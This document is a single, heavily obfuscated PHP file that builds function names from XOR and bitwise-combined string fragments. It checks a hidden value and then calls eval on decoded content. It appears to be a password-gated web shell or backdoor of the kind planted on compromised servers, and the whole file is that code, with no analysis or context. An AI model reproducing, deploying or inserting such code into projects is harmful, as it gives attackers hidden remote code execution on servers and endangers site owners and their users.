<?php
$i6EoFbLhoJ='Yl7hAx'^JOKVK;$ZR3sC=BSc5CgnB.'@Ld'^'&vUQ-VFf$eB';$iMh3j2fkm='.0_'^SWb;$oK=#M'.
            'o|5'&'o~}';$djM='w}wg~w'&'ouu}~w';$ZYZ8g29eKE_='a4$`" bb4)!'|'yi(3`$`r|- ';/*'.
            'p*/$SPdPxmHhq='?>'.figbn.'}:c'&"74vc~".ob77e;$hyFG1VPX8f5='`'^U;$Z1_S0a_=#_Ia'.
            '8'|'1';$H3xtEggyi=t&';';$BII=ehg62P.'("4Z?'^')-1SZ"@'.RQ3S;$Vja="%<G:SS"^'RY3'.
            ']=%';$EE5zxAyJOS=t9yd.'=,'^'<m-4bm';$dr='`f6@'|'! 5a';$z1Qg8=$ZR3sC|$BII;'Sn2'.
            'p$f<?qn=';$iU=$iMh3j2fkm&$oK;$RmKJ8=$djM&$Vja;$q1ly4AU=$ZYZ8g29eKE_^('}mz+?|='.
            ';q~i'&'1;xw}}?;?~n');if(!$z1Qg8($iU($RmKJ8($EE5zxAyJOS)),$SPdPxmHhq.$dr./*X0h'.
            '-N_*/$hyFG1VPX8f5.('(B3`!1$2'|"9".b1a1."#d4").(_^o).$Z1_S0a_.(' !6880'|#fcpB2'.
            '2a7 1!').$H3xtEggyi))eval($RmKJ8($q1ly4AU));#d_U)vzWuL48D >aK$Tmnp#z=fbe>B]3'.
            'h3?atID&$_SNCG6Kwx&Q@KH]KUvs_FHhQ8#0O6z,uGDMXT9,puIjSCHGHk8A@Fhq';